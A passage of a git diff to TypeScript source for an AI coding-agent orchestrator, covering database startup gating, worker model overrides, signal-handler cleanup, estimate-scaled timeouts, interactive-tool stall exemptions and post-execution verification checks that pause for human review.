+        if (hasDecisions || hasRequirements || hasMilestones) {
           const { migrateFromMarkdown } = await import("./md-importer.js");
-          openDb(gsdDbPath);
           migrateFromMarkdown(s.basePath);
-        } catch (err) {
-          process.stderr.write(
-            `gsd-migrate: auto-migration failed: ${(err as Error).message}\n`,
-          );
         }
+      } catch (err) {
+        logError("engine", `auto-migration failed: ${(err as Error).message}`);
       }
     }
     if (existsSync(gsdDbPath) && !isDbAvailable()) {
@@ -503,27 +695,57 @@ export async function bootstrapAutoSession(
         const { openDatabase: openDb } = await import("./gsd-db.js");
         openDb(gsdDbPath);
       } catch (err) {
-        process.stderr.write(
-          `gsd-db: failed to open existing database: ${(err as Error).message}\n`,
-        );
+        logError("engine", `failed to open existing database: ${(err as Error).message}`);
       }
     }
 
+    // Gate: abort bootstrap if the DB file exists but the provider is
+    // still unavailable after both open attempts above. Without this,
+    // auto-mode starts but every gsd_task_complete / gsd_slice_complete
+    // call returns "db_unavailable", triggering artifact-retry which
+    // re-dispatches the same task — producing an infinite loop (#2419).
+    if (existsSync(gsdDbPath) && !isDbAvailable()) {
+      ctx.ui.notify(
+        "SQLite database exists but failed to open. Auto-mode cannot proceed without a working database provider. " +
+          "Check for corrupt gsd.db or missing native SQLite bindings.",
+        "error",
+      );
+      return releaseLockAndReturn();
+    }
+
     // Initialize metrics
     initMetrics(s.basePath);
 
     // Initialize routing history
     initRoutingHistory(s.basePath);
 
-    // Capture session's model at auto-mode start (#650)
-    const currentModel = ctx.model;
-    if (currentModel) {
+    // Restore the model that was active when auto bootstrap began (#650, #2829).
+    if (startModelSnapshot) {
       s.autoModeStartModel = {
-        provider: currentModel.provider,
-        id: currentModel.id,
+        provider: startModelSnapshot.provider,
+        id: startModelSnapshot.id,
       };
     }
 
+    // Apply worker model override from parallel orchestrator (#worker-model).
+    // GSD_WORKER_MODEL is injected by the coordinator when parallel.worker_model
+    // is configured, so parallel milestone workers use a cheaper model than the
+    // coordinator session (e.g. Haiku for execution, Sonnet for planning).
+    const workerModelOverride = process.env.GSD_WORKER_MODEL;
+    if (workerModelOverride && process.env.GSD_PARALLEL_WORKER === "1") {
+      const availableModels = ctx.modelRegistry.getAvailable();
+      const { resolveModelId } = await import("./auto-model-selection.js");
+      const overrideModel = resolveModelId(workerModelOverride, availableModels, ctx.model?.provider);
+      if (overrideModel) {
+        const ok = await pi.setModel(overrideModel, { persist: false });
+        if (ok) {
+          // Update start model so all subsequent units use this as the baseline
+          s.autoModeStartModel = { provider: overrideModel.provider, id: overrideModel.id };
+          ctx.ui.notify(`Worker model override: ${overrideModel.provider}/${overrideModel.id}`, "info");
+        }
+      }
+    }
+
     // Snapshot installed skills
     if (resolveSkillDiscoveryMode() !== "off") {
       snapshotSkills();
@@ -545,9 +767,8 @@ export async function bootstrapAutoSession(
       lockBase(),
       "starting",
       s.currentMilestoneId ?? "unknown",
-      0,
     );
-    writeLock(lockBase(), "starting", s.currentMilestoneId ?? "unknown", 0);
+    writeLock(lockBase(), "starting", s.currentMilestoneId ?? "unknown");
 
     // Secrets collection gate
     const mid = state.activeMilestone!.id;
@@ -605,6 +826,12 @@ export async function bootstrapAutoSession(
         if (milestoneIds.length > 1) {
           const issues: string[] = [];
           for (const id of milestoneIds) {
+            // Skip completed/parked milestones — a leftover CONTEXT-DRAFT.md
+            // on a finished milestone is harmless residue, not an actionable warning.
+            if (isDbAvailable()) {
+              const ms = getMilestone(id);
+              if (ms?.status === "complete" || ms?.status === "parked") continue;
+            }
             const draft = resolveMilestoneFile(base, id, "CONTEXT-DRAFT");
             if (draft)
               issues.push(
@@ -624,8 +851,9 @@ export async function bootstrapAutoSession(
           }
         }
       }
-    } catch {
+    } catch (err) {
       /* non-fatal */
+      logWarning("engine", `preflight validation failed: ${err instanceof Error ? err.message : String(err)}`);
     }
 
     return true;
@@ -635,3 +863,4 @@ export async function bootstrapAutoSession(
     throw err;
   }
 }
+
diff --git a/src/resources/extensions/gsd/auto-supervisor.ts b/src/resources/extensions/gsd/auto-supervisor.ts
index 4777f68e2..49bfbeca0 100644
--- a/src/resources/extensions/gsd/auto-supervisor.ts
+++ b/src/resources/extensions/gsd/auto-supervisor.ts
@@ -13,6 +13,10 @@ import { nativeHasChanges } from "./native-git-bridge.js";
 /** Signals that should trigger lock cleanup on process termination. */
 const CLEANUP_SIGNALS: NodeJS.Signals[] = ["SIGTERM", "SIGHUP", "SIGINT"];
 
+/** Module-level reference to the last registered handler, used as a safety net
+ *  to prevent handler accumulation if the caller neglects to pass previousHandler. */
+let _currentSigtermHandler: (() => void) | null = null;
+
 /**
  * Register signal handlers that clear lock files and exit cleanly.
  * Installs handlers on SIGTERM, SIGHUP, and SIGINT so that lock files
@@ -29,15 +33,22 @@ export function registerSigtermHandler(
   currentBasePath: string,
   previousHandler: (() => void) | null,
 ): () => void {
+  // Remove the explicitly-passed previous handler
   if (previousHandler) {
     for (const sig of CLEANUP_SIGNALS) process.off(sig, previousHandler);
   }
+  // Safety net: also remove the module-tracked handler in case the caller
+  // forgot to pass previousHandler (prevents handler accumulation)
+  if (_currentSigtermHandler && _currentSigtermHandler !== previousHandler) {
+    for (const sig of CLEANUP_SIGNALS) process.off(sig, _currentSigtermHandler);
+  }
   const handler = () => {
     clearLock(currentBasePath);
     releaseSessionLock(currentBasePath);
     process.exit(0);
   };
   for (const sig of CLEANUP_SIGNALS) process.on(sig, handler);
+  _currentSigtermHandler = handler;
   return handler;
 }
 
@@ -46,6 +57,9 @@ export function deregisterSigtermHandler(handler: (() => void) | null): void {
   if (handler) {
     for (const sig of CLEANUP_SIGNALS) process.off(sig, handler);
   }
+  if (_currentSigtermHandler === handler) {
+    _currentSigtermHandler = null;
+  }
 }
 
 // ─── Working Tree Activity Detection ──────────────────────────────────────────
diff --git a/src/resources/extensions/gsd/auto-timeout-recovery.ts b/src/resources/extensions/gsd/auto-timeout-recovery.ts
index 9177c8361..4d62a9fec 100644
--- a/src/resources/extensions/gsd/auto-timeout-recovery.ts
+++ b/src/resources/extensions/gsd/auto-timeout-recovery.ts
@@ -14,7 +14,6 @@ import {
 import {
   resolveExpectedArtifactPath,
   diagnoseExpectedArtifact,
-  skipExecuteTask,
   writeBlockerPlaceholder,
 } from "./auto-recovery.js";
 import { existsSync } from "node:fs";
@@ -127,14 +126,14 @@ export async function recoverTimedOutUnit(
       return "recovered";
     }
 
-    // Retries exhausted — write missing durable artifacts and advance.
+    // Retries exhausted — write a blocker placeholder and advance.
     const diagnostic = formatExecuteTaskRecoveryStatus(status);
-    const [mid, sid, tid] = unitId.split("/");
-    const skipped = mid && sid && tid
-      ? skipExecuteTask(basePath, mid, sid, tid, status, reason, maxRecoveryAttempts)
-      : false;
+    const placeholder = writeBlockerPlaceholder(
+      unitType, unitId, basePath,
+      `${reason} recovery exhausted ${maxRecoveryAttempts} attempts. Status: ${diagnostic}`,
+    );
 
-    if (skipped) {
+    if (placeholder) {
       writeUnitRuntimeRecord(basePath, unitType, unitId, currentUnitStartedAt, {
         phase: "skipped",
         recovery: status,
diff --git a/src/resources/extensions/gsd/auto-timers.ts b/src/resources/extensions/gsd/auto-timers.ts
index f69eb4d01..3b7b11f81 100644
--- a/src/resources/extensions/gsd/auto-timers.ts
+++ b/src/resources/extensions/gsd/auto-timers.ts
@@ -8,12 +8,15 @@
 
 import type { ExtensionAPI, ExtensionContext } from "@gsd/pi-coding-agent";
 import { readUnitRuntimeRecord, writeUnitRuntimeRecord } from "./unit-runtime.js";
+import { isDbAvailable, getMilestoneSlices, getSliceTasks } from "./gsd-db.js";
 import { resolveAutoSupervisorConfig } from "./preferences.js";
 import type { GSDPreferences } from "./preferences.js";
 import { computeBudgets, resolveExecutorContextWindow } from "./context-budget.js";
 import {
   getInFlightToolCount,
   getOldestInFlightToolStart,
+  clearInFlightTools,
+  hasInteractiveToolInFlight,
 } from "./auto-tool-tracking.js";
 import { detectWorkingTreeActivity } from "./auto-supervisor.js";
 import { closeoutUnit, type CloseoutOptions } from "./auto-unit-closeout.js";
@@ -21,6 +24,7 @@ import { saveActivityLog } from "./activity-log.js";
 import { recoverTimedOutUnit, type RecoveryContext } from "./auto-timeout-recovery.js";
 import { resolveAgentEndCancelled } from "./auto/resolve.js";
 import type { AutoSession } from "./auto/session.js";
+import { logWarning, logError } from "./workflow-logger.js";
 
 export interface SupervisionContext {
   s: AutoSession;
@@ -32,6 +36,8 @@ export interface SupervisionContext {
   buildSnapshotOpts: () => CloseoutOptions & Record<string, unknown>;
   buildRecoveryContext: () => RecoveryContext;
   pauseAuto: (ctx?: ExtensionContext, pi?: ExtensionAPI) => Promise<void>;
+  /** Optional task estimate string (e.g. "30m", "2h") for timeout scaling (#2243). */
+  taskEstimate?: string;
 }
 
 /**
@@ -41,13 +47,73 @@ export interface SupervisionContext {
  * 3. Hard timeout (pause + recovery)
  * 4. Context-pressure monitor (continue-here)
  */
+
+/**
+ * Parse a task estimate string (e.g. "30m", "2h", "1h30m") into minutes.
+ * Returns null if the string cannot be parsed.
+ */
+export function parseEstimateMinutes(estimate: string): number | null {
+  if (!estimate || typeof estimate !== "string") return null;
+  const trimmed = estimate.trim();
+  if (!trimmed) return null;
+
+  let totalMinutes = 0;
+  let matched = false;
+
+  // Match hours component
+  const hoursMatch = trimmed.match(/(\d+)\s*h/i);
+  if (hoursMatch) {
+    totalMinutes += Number(hoursMatch[1]) * 60;
+    matched = true;
+  }
+
+  // Match minutes component
+  const minutesMatch = trimmed.match(/(\d+)\s*m/i);
+  if (minutesMatch) {
+    totalMinutes += Number(minutesMatch[1]);
+    matched = true;
+  }
+
+  return matched ? totalMinutes : null;
+}
+
 export function startUnitSupervision(sctx: SupervisionContext): void {
   const { s, ctx, pi, unitType, unitId, prefs, buildSnapshotOpts, buildRecoveryContext, pauseAuto } = sctx;
 
   const supervisor = resolveAutoSupervisorConfig();
-  const softTimeoutMs = (supervisor.soft_timeout_minutes ?? 0) * 60 * 1000;
-  const idleTimeoutMs = (supervisor.idle_timeout_minutes ?? 0) * 60 * 1000;
-  const hardTimeoutMs = (supervisor.hard_timeout_minutes ?? 0) * 60 * 1000;
+
+  // Scale timeouts based on task estimate annotations (#2243).
+  // If the task has an est: annotation, use it to extend the hard and soft timeouts
+  // so longer tasks don't get prematurely timed out.
+  let taskEstimate = sctx.taskEstimate;
+  if (!taskEstimate && unitType === "task" && isDbAvailable()) {
+    // Look up the task estimate from the DB (#2243).
+    try {
+      if (s.currentMilestoneId) {
+        const slices = getMilestoneSlices(s.currentMilestoneId);
+        for (const slice of slices) {
+          const tasks = getSliceTasks(s.currentMilestoneId, slice.id);
+          const task = tasks.find(t => t.id === unitId);
+          if (task?.estimate) {
+            taskEstimate = task.estimate;
+            break;
+          }
+        }
+      }
+    } catch (err) {
+      // Non-fatal — fall through with no estimate
+      logWarning("timer", `operation failed: ${err instanceof Error ? err.message : String(err)}`);
+    }
+  }
+  const estimateMinutes = taskEstimate ? parseEstimateMinutes(taskEstimate) : null;
+  const MAX_TIMEOUT_SCALE = 6; // Cap at 6x (60min task). Prevents 2h+ tasks from creating 120min+ timeout windows.
+  const timeoutScale = estimateMinutes && estimateMinutes > 0
+    ? Math.min(MAX_TIMEOUT_SCALE, Math.max(1, estimateMinutes / 10))
+    : 1;
+
+  const softTimeoutMs = (supervisor.soft_timeout_minutes ?? 0) * 60 * 1000 * timeoutScale;
+  const idleTimeoutMs = (supervisor.idle_timeout_minutes ?? 0) * 60 * 1000;  // idle not scaled — idle is idle
+  const hardTimeoutMs = (supervisor.hard_timeout_minutes ?? 0) * 60 * 1000 * timeoutScale;
 
   // ── 1. Soft timeout warning ──
   s.wrapupWarningHandle = setTimeout(() => {
@@ -57,6 +123,10 @@ export function startUnitSupervision(sctx: SupervisionContext): void {
       phase: "wrapup-warning-sent",
       wrapupWarningSent: true,
     });
+    // Only trigger a new turn if no tools are currently in flight.
+    // Triggering during active tool calls causes tool results to be skipped
+    // with "Skipped due to queued user message", leading to provider errors (#3512).
+    const softTrigger = getInFlightToolCount() === 0;
     pi.sendMessage(
       {
         customType: "gsd-auto-wrapup",
@@ -71,7 +141,7 @@ export function startUnitSupervision(sctx: SupervisionContext): void {
           "4. leave precise resume notes if anything remains unfinished",
         ].join("\n"),
       },
-      { triggerTurn: true },
+      { triggerTurn: softTrigger },
     );
   }, softTimeoutMs);
 
@@ -85,7 +155,17 @@ export function startUnitSupervision(sctx: SupervisionContext): void {
 
       // Agent has tool calls currently executing — not idle, just waiting.
       // But only suppress recovery if the tool started recently.
+      let stalledToolDetected = false;
       if (getInFlightToolCount() > 0) {
+        // User-interactive tools (ask_user_questions, secure_env_collect) block
+        // waiting for human input by design — never treat them as stalled (#2676).
+        if (hasInteractiveToolInFlight()) {
+          writeUnitRuntimeRecord(s.basePath, unitType, unitId, s.currentUnit.startedAt, {
+            lastProgressAt: Date.now(),
+            lastProgressKind: "interactive-tool-waiting",
+          });
+          return;
+        }
         const oldestStart = getOldestInFlightToolStart()!;
         const toolAgeMs = Date.now() - oldestStart;
         if (toolAgeMs < idleTimeoutMs) {
@@ -95,6 +175,12 @@ export function startUnitSupervision(sctx: SupervisionContext): void {
           });
           return;
         }
+        // Tool has been in-flight longer than idle timeout — treat as hung.
+        // Clear the stale entries so subsequent ticks don't re-detect them,
+        // and set the flag so the filesystem-activity check below does not
+        // override the stall verdict (#2527).
+        stalledToolDetected = true;
+        clearInFlightTools();
         ctx.ui.notify(
           `Stalled tool detected: a tool has been in-flight for ${Math.round(toolAgeMs / 60000)}min. Treating as hung — attempting idle recovery.`,
           "warning",
@@ -102,7 +188,9 @@ export function startUnitSupervision(sctx: SupervisionContext): void {
       }
 
       // Check if the agent is producing work on disk.
-      if (detectWorkingTreeActivity(s.basePath)) {
+      // Skip this when a stalled tool was just detected — filesystem changes
+      // from earlier in the task should not override the stall verdict (#2527).
+      if (!stalledToolDetected && detectWorkingTreeActivity(s.basePath)) {
         writeUnitRuntimeRecord(s.basePath, unitType, unitId, s.currentUnit.startedAt, {
           lastProgressAt: Date.now(),
           lastProgressKind: "filesystem-activity",
@@ -119,6 +207,10 @@ export function startUnitSupervision(sctx: SupervisionContext): void {
       const recovery = await recoverTimedOutUnit(ctx, pi, unitType, unitId, "idle", buildRecoveryContext());
       if (recovery === "recovered") return;
 
+      // Guard: recoverTimedOutUnit is async — pauseAuto/stopAuto may have
+      // set s.currentUnit = null during the await (#2527).
+      if (!s.currentUnit) return;
+
       writeUnitRuntimeRecord(s.basePath, unitType, unitId, s.currentUnit.startedAt, {
         phase: "paused",
       });
@@ -129,12 +221,14 @@ export function startUnitSupervision(sctx: SupervisionContext): void {
       await pauseAuto(ctx, pi);
     } catch (err) {
       const message = err instanceof Error ? err.message : String(err);
-      console.error(`[idle-watchdog] Unhandled error: ${message}`);
+      logError("timer", `[idle-watchdog] Unhandled error: ${message}`);
       // Unblock any pending unit promise so the auto-loop is not orphaned.
-      resolveAgentEndCancelled();
+      resolveAgentEndCancelled({ message: `Idle watchdog error: ${message}`, category: "idle", isTransient: true });
       try {
         ctx.ui.notify(`Idle watchdog error: ${message}`, "warning");
-      } catch { /* best effort */ }
+      } catch (err) { /* best effort */
+        logWarning("timer", `notification failed: ${err instanceof Error ? err.message : String(err)}`);
+      }
     }
   }, 15000);
 
@@ -163,12 +257,14 @@ export function startUnitSupervision(sctx: SupervisionContext): void {
       await pauseAuto(ctx, pi);
     } catch (err) {
       const message = err instanceof Error ? err.message : String(err);
-      console.error(`[hard-timeout] Unhandled error: ${message}`);
+      logError("timer", `[hard-timeout] Unhandled error: ${message}`);
       // Unblock any pending unit promise so the auto-loop is not orphaned.
-      resolveAgentEndCancelled();
+      resolveAgentEndCancelled({ message: `Hard timeout error: ${message}`, category: "timeout", isTransient: true });
       try {
         ctx.ui.notify(`Hard timeout error: ${message}`, "warning");
-      } catch { /* best effort */ }
+      } catch (err) { /* best effort */
+        logWarning("timer", `notification failed: ${err instanceof Error ? err.message : String(err)}`);
+      }
     }
   }, hardTimeoutMs);
 
@@ -202,6 +298,8 @@ export function startUnitSupervision(sctx: SupervisionContext): void {
       );
     }
 
+    // Only trigger a new turn if no tools are currently in flight (#3512).
+    const contextTrigger = getInFlightToolCount() === 0;
     pi.sendMessage(
       {
         customType: "gsd-auto-wrapup",
@@ -217,7 +315,7 @@ export function startUnitSupervision(sctx: SupervisionContext): void {
           "Do NOT start new sub-tasks or investigations.",
         ].join("\n"),
       },
-      { triggerTurn: true },
+      { triggerTurn: contextTrigger },
     );
 
     if (s.continueHereHandle) {
@@ -226,3 +324,4 @@ export function startUnitSupervision(sctx: SupervisionContext): void {
     }
   }, 15_000);
 }
+
diff --git a/src/resources/extensions/gsd/auto-tool-tracking.ts b/src/resources/extensions/gsd/auto-tool-tracking.ts
index eea96c602..9e7ffc049 100644
--- a/src/resources/extensions/gsd/auto-tool-tracking.ts
+++ b/src/resources/extensions/gsd/auto-tool-tracking.ts
@@ -4,15 +4,27 @@
  * can distinguish "waiting for tool completion" from "truly idle".
  */
 
-const inFlightTools = new Map<string, number>();
+interface InFlightTool {
+  startedAt: number;
+  toolName: string;
+}
+
+const inFlightTools = new Map<string, InFlightTool>();
+
+/**
+ * Tools that block waiting for human input by design.
+ * The idle watchdog must not treat these as stalled.
+ */
+const INTERACTIVE_TOOLS = new Set(["ask_user_questions", "secure_env_collect"]);
 
 /**
  * Mark a tool execution as in-flight.
- * Records start time so the idle watchdog can detect tools hung longer than the idle timeout.
+ * Records start time and tool name so the idle watchdog can detect tools
+ * hung longer than the idle timeout while exempting interactive tools.
  */
-export function markToolStart(toolCallId: string, isActive: boolean): void {
+export function markToolStart(toolCallId: string, isActive: boolean, toolName?: string): void {
   if (!isActive) return;
-  inFlightTools.set(toolCallId, Date.now());
+  inFlightTools.set(toolCallId, { startedAt: Date.now(), toolName: toolName ?? "unknown" });
 }
 
 /**
@@ -29,7 +41,7 @@ export function getOldestInFlightToolAgeMs(): number {
   if (inFlightTools.size === 0) return 0;
   let oldestStart = Infinity;
   for (const t of inFlightTools.values()) {
-    if (t < oldestStart) oldestStart = t;
+    if (t.startedAt < oldestStart) oldestStart = t.startedAt;
   }
   return Date.now() - oldestStart;
 }
@@ -48,14 +60,55 @@ export function getOldestInFlightToolStart(): number | undefined {
   if (inFlightTools.size === 0) return undefined;
   let oldest = Infinity;
   for (const t of inFlightTools.values()) {
-    if (t < oldest) oldest = t;
+    if (t.startedAt < oldest) oldest = t.startedAt;
   }
   return oldest;
 }
 
+/**
+ * Returns true if any currently in-flight tool is a user-interactive tool
+ * (e.g. ask_user_questions, secure_env_collect) that blocks waiting for
+ * human input. These must be exempt from idle stall detection.
+ */
+export function hasInteractiveToolInFlight(): boolean {
+  for (const { toolName } of inFlightTools.values()) {
+    if (INTERACTIVE_TOOLS.has(toolName)) return true;
+  }
+  return false;
+}
+
 /**
  * Clear all in-flight tool tracking state.
  */
 export function clearInFlightTools(): void {
   inFlightTools.clear();
 }
+
+// ─── Tool invocation error classification (#2883) ────────────────────────
+
+/**
+ * Patterns that indicate a tool invocation failed due to malformed or truncated
+ * JSON arguments — as opposed to a normal business-logic error from the tool
+ * handler. When these errors occur, retrying the same unit will produce the same
+ * failure, so the retry loop must be broken.
+ */
+const TOOL_INVOCATION_ERROR_RE = /Validation failed for tool|Expected ',' or '\}' in JSON|Unexpected end of JSON|Unexpected token.*in JSON/i;
+
+/**
+ * Returns true if the error message indicates a tool invocation failure due to
+ * malformed/truncated arguments (as opposed to a normal tool execution error).
+ */
+export function isToolInvocationError(errorMsg: string): boolean {
+  if (!errorMsg) return false;
+  return TOOL_INVOCATION_ERROR_RE.test(errorMsg);
+}
+
+/**
+ * Returns true if the error message indicates the tool was skipped because
+ * a queued user message interrupted the turn (#3595).  Retrying will produce
+ * the same skip, so the unit should be paused rather than retried.
+ */
+export function isQueuedUserMessageSkip(errorMsg: string): boolean {
+  if (!errorMsg) return false;
+  return /^Skipped due to queued user message\.?$/i.test(errorMsg.trim());
+}
diff --git a/src/resources/extensions/gsd/auto-unit-closeout.ts b/src/resources/extensions/gsd/auto-unit-closeout.ts
index 8d5bf4f94..ccd274176 100644
--- a/src/resources/extensions/gsd/auto-unit-closeout.ts
+++ b/src/resources/extensions/gsd/auto-unit-closeout.ts
@@ -7,6 +7,7 @@
 import type { ExtensionContext } from "@gsd/pi-coding-agent";
 import { snapshotUnitMetrics } from "./metrics.js";
 import { saveActivityLog } from "./activity-log.js";
+import { logWarning } from "./workflow-logger.js";
 
 export interface CloseoutOptions {
   promptCharCount?: number;
@@ -38,11 +39,14 @@ export async function closeoutUnit(
       const llmCallFn = buildMemoryLLMCall(ctx);
       if (llmCallFn) {
         extractMemoriesFromUnit(activityFile, unitType, unitId, llmCallFn).catch((err) => {
-          if (process.env.GSD_DEBUG) console.error(`[gsd] memory extraction failed for ${unitType}/${unitId}:`, err);
+          logWarning("engine", `memory extraction failed for ${unitType}/${unitId}: ${(err as Error).message}`);
         });
       }
-    } catch { /* non-fatal */ }
+    } catch (err) { /* non-fatal */
+      logWarning("engine", `operation failed: ${err instanceof Error ? err.message : String(err)}`);
+    }
   }
 
   return activityFile ?? undefined;
 }
+
diff --git a/src/resources/extensions/gsd/auto-utils.ts b/src/resources/extensions/gsd/auto-utils.ts
new file mode 100644
index 000000000..ec8b23c6f
--- /dev/null
+++ b/src/resources/extensions/gsd/auto-utils.ts
@@ -0,0 +1,25 @@
+// Shared utilities for the auto-loop modules (auto-post-unit, auto, etc.).
+
+import { debugLog } from "./debug-logger.js";
+
+/**
+ * Run a non-fatal operation, logging any error via `debugLog` and continuing.
+ *
+ * Replaces the repeated try-catch-debugLog-continue boilerplate that wraps
+ * operations whose failure should not abort the post-unit pipeline.
+ *
+ * @param context - The debugLog event name (e.g. "postUnit")
+ * @param phase   - The phase label attached to the debug entry
+ * @param fn      - The operation to execute (may be sync or async)
+ */
+export async function runSafely(
+  context: string,
+  phase: string,
+  fn: () => Promise<void> | void,
+): Promise<void> {
+  try {
+    await fn();
+  } catch (e) {
+    debugLog(context, { phase, error: String(e) });
+  }
+}
diff --git a/src/resources/extensions/gsd/auto-verification.ts b/src/resources/extensions/gsd/auto-verification.ts
index 1e9045d74..73595df46 100644
--- a/src/resources/extensions/gsd/auto-verification.ts
+++ b/src/resources/extensions/gsd/auto-verification.ts
@@ -11,8 +11,10 @@
  */
 
 import type { ExtensionContext, ExtensionAPI } from "@gsd/pi-coding-agent";
-import { loadFile, parsePlan } from "./files.js";
+import { mkdirSync, writeFileSync } from "node:fs";
 import { resolveSliceFile, resolveSlicePath } from "./paths.js";
+import { parseUnitId } from "./unit-id.js";
+import { isDbAvailable, getTask, getSliceTasks, type TaskRow } from "./gsd-db.js";
 import { loadEffectiveGSDPreferences } from "./preferences.js";
 import {
   runVerificationGate,
@@ -20,8 +22,11 @@ import {
   captureRuntimeErrors,
   runDependencyAudit,
 } from "./verification-gate.js";
-import { writeVerificationJSON } from "./verification-evidence.js";
+import { writeVerificationJSON, type PostExecutionCheckJSON, type EvidenceJSON } from "./verification-evidence.js";
+import { logWarning } from "./workflow-logger.js";
+import { runPostExecutionChecks, type PostExecutionResult } from "./post-execution-checks.js";
 import type { AutoSession } from "./auto/session.js";
+import type { VerificationResult as VerificationGateResult } from "./types.js";
 import { join } from "node:path";
 
 export interface VerificationContext {
@@ -60,24 +65,16 @@ export async function runPostUnitVerification(
     const prefs = effectivePrefs?.preferences;
 
     // Read task plan verify field
-    const parts = s.currentUnit.id.split("/");
+    const { milestone: mid, slice: sid, task: tid } = parseUnitId(s.currentUnit.id);
     let taskPlanVerify: string | undefined;
-    if (parts.length >= 3) {
-      const [mid, sid, tid] = parts;
-      const planFile = resolveSliceFile(s.basePath, mid, sid, "PLAN");
-      if (planFile) {
-        const planContent = await loadFile(planFile);
-        if (planContent) {
-          const slicePlan = parsePlan(planContent);
-          const taskEntry = slicePlan?.tasks?.find((t) => t.id === tid);
-          taskPlanVerify = taskEntry?.verify;
-        }
+    if (mid && sid && tid) {
+      if (isDbAvailable()) {
+        taskPlanVerify = getTask(mid, sid, tid)?.verify;
       }
+      // When DB unavailable, taskPlanVerify stays undefined — gate runs without task-specific checks
     }
 
     const result = runVerificationGate({
-      basePath: s.basePath,
-      unitId: s.currentUnit.id,
       cwd: s.basePath,
       preferenceCommands: prefs?.verification_commands,
       taskPlanVerify,
@@ -146,9 +143,8 @@ export async function runPostUnitVerification(
 
     // Write verification evidence JSON
     const attempt = s.verificationRetryCount.get(s.currentUnit.id) ?? 0;
-    if (parts.length >= 3) {
+    if (mid && sid && tid) {
       try {
-        const [mid, sid, tid] = parts;
         const sDir = resolveSlicePath(s.basePath, mid, sid);
         if (sDir) {
           const tasksDir = join(sDir, "tasks");
@@ -167,9 +163,7 @@ export async function runPostUnitVerification(
           }
         }
       } catch (evidenceErr) {
-        process.stderr.write(
-          `verification-evidence: write error — ${(evidenceErr as Error).message}\n`,
-        );
+        logWarning("engine", `verification-evidence write error: ${(evidenceErr as Error).message}`);
       }
     }
 
@@ -192,11 +186,140 @@ export async function runPostUnitVerification(
       return "continue";
     }
 
+    // ── Post-execution checks (run after main verification passes for execute-task units) ──
+    let postExecChecks: PostExecutionCheckJSON[] | undefined;
+    let postExecBlockingFailure = false;
+
+    if (result.passed && mid && sid && tid) {
+      // Check preferences — respect enhanced_verification and enhanced_verification_post
+      const enhancedEnabled = prefs?.enhanced_verification !== false; // default true
+      const postEnabled = prefs?.enhanced_verification_post !== false; // default true
+
+      if (enhancedEnabled && postEnabled && isDbAvailable()) {
+        try {
+          // Get the completed task from DB
+          const taskRow = getTask(mid, sid, tid);
+          if (taskRow && taskRow.key_files && taskRow.key_files.length > 0) {
+            // Get all tasks in the slice
+            const allTasks = getSliceTasks(mid, sid);
+            // Filter to prior completed tasks (status = 'complete' or 'done', before current task)
+            const priorTasks = allTasks.filter(
+              (t: TaskRow) =>
+                (t.status === "complete" || t.status === "done") &&
+                t.id !== tid &&
+                t.sequence < taskRow.sequence
+            );
+
+            // Run post-execution checks
+            const postExecResult: PostExecutionResult = runPostExecutionChecks(
+              taskRow,
+              priorTasks,
+              s.basePath
+            );
+
+            // Store checks for evidence JSON
+            postExecChecks = postExecResult.checks;
+
+            // Log summary to stderr with gsd-post-exec: prefix
+            const emoji =
+              postExecResult.status === "pass"
+                ? "✅"
+                : postExecResult.status === "warn"
+                  ? "⚠️"
+                  : "❌";
+            process.stderr.write(
+              `gsd-post-exec: ${emoji} Post-execution checks ${postExecResult.status} for ${mid}/${sid}/${tid} (${postExecResult.durationMs}ms)\n`
+            );
+
+            // Log individual check results
+            for (const check of postExecResult.checks) {
+              const checkEmoji = check.passed
+                ? "✓"
+                : check.blocking
+                  ? "✗"
+                  : "⚠";
+              process.stderr.write(
+                `gsd-post-exec:   ${checkEmoji} [${check.category}] ${check.target}: ${check.message}\n`
+              );
+            }
+
+            // Check for blocking failures
+            if (postExecResult.status === "fail") {
+              postExecBlockingFailure = true;
+              const blockingCount = postExecResult.checks.filter(
+                (c) => !c.passed && c.blocking
+              ).length;
+              ctx.ui.notify(
+                `Post-execution checks failed: ${blockingCount} blocking issue${blockingCount === 1 ? "" : "s"} found`,
+                "error"
+              );
+            } else if (postExecResult.status === "warn") {
+              ctx.ui.notify(
+                `Post-execution checks passed with warnings`,
+                "warning"
+              );
+              // Strict mode: treat warnings as blocking
+              if (prefs?.enhanced_verification_strict === true) {
+                postExecBlockingFailure = true;
+              }
+            }
+          }
+        } catch (postExecErr) {
+          // Post-execution check errors are non-fatal — log and continue
+          logWarning("engine", `gsd-post-exec: error — ${(postExecErr as Error).message}`);
+        }
+      }
+    }
+
+    // Re-write verification evidence JSON with post-execution checks
+    if (postExecChecks && postExecChecks.length > 0 && mid && sid && tid) {
+      try {
+        const sDir = resolveSlicePath(s.basePath, mid, sid);
+        if (sDir) {
+          const tasksDir = join(sDir, "tasks");
+          // Add postExecutionChecks to the result for the JSON write
+          const resultWithPostExec = {
+            ...result,
+            // Mark as failed if there was a blocking post-exec failure
+            passed: result.passed && !postExecBlockingFailure,
+          };
+          // Manually write with postExecutionChecks field
+          writeVerificationJSONWithPostExec(
+            resultWithPostExec,
+            tasksDir,
+            tid,
+            s.currentUnit.id,
+            postExecChecks,
+            postExecBlockingFailure ? attempt + 1 : undefined,
+            postExecBlockingFailure ? maxRetries : undefined
+          );
+        }
+      } catch (evidenceErr) {
+        logWarning("engine", `verification-evidence: post-exec write error — ${(evidenceErr as Error).message}`);
+      }
+    }
+
+    // Update result.passed based on post-execution checks
+    if (postExecBlockingFailure) {
+      result.passed = false;
+    }
+
     // ── Auto-fix retry logic ──
     if (result.passed) {
       s.verificationRetryCount.delete(s.currentUnit.id);
       s.pendingVerificationRetry = null;
       return "continue";
+    } else if (postExecBlockingFailure) {
+      // Post-execution failures are cross-task consistency issues — retrying the same task won't fix them.
+      // Skip retry and pause immediately for human review.
+      s.verificationRetryCount.delete(s.currentUnit.id);
+      s.pendingVerificationRetry = null;
+      ctx.ui.notify(
+        `Post-execution checks failed — cross-task consistency issue detected, pausing for human review`,
+        "error",
+      );
+      await pauseAuto(ctx, pi);
+      return "pause";
     } else if (autoFixEnabled && attempt + 1 <= maxRetries) {
       const nextAttempt = attempt + 1;
       s.verificationRetryCount.set(s.currentUnit.id, nextAttempt);
@@ -205,19 +328,30 @@ export async function runPostUnitVerification(
         failureContext: formatFailureContext(result),
         attempt: nextAttempt,
       };
+      const failedCmds = result.checks
+        .filter((c) => c.exitCode !== 0)
+        .map((c) => c.command);
+      const cmdSummary = failedCmds.length <= 3
+        ? failedCmds.join(", ")
+        : `${failedCmds.slice(0, 3).join(", ")}... and ${failedCmds.length - 3} more`;
       ctx.ui.notify(
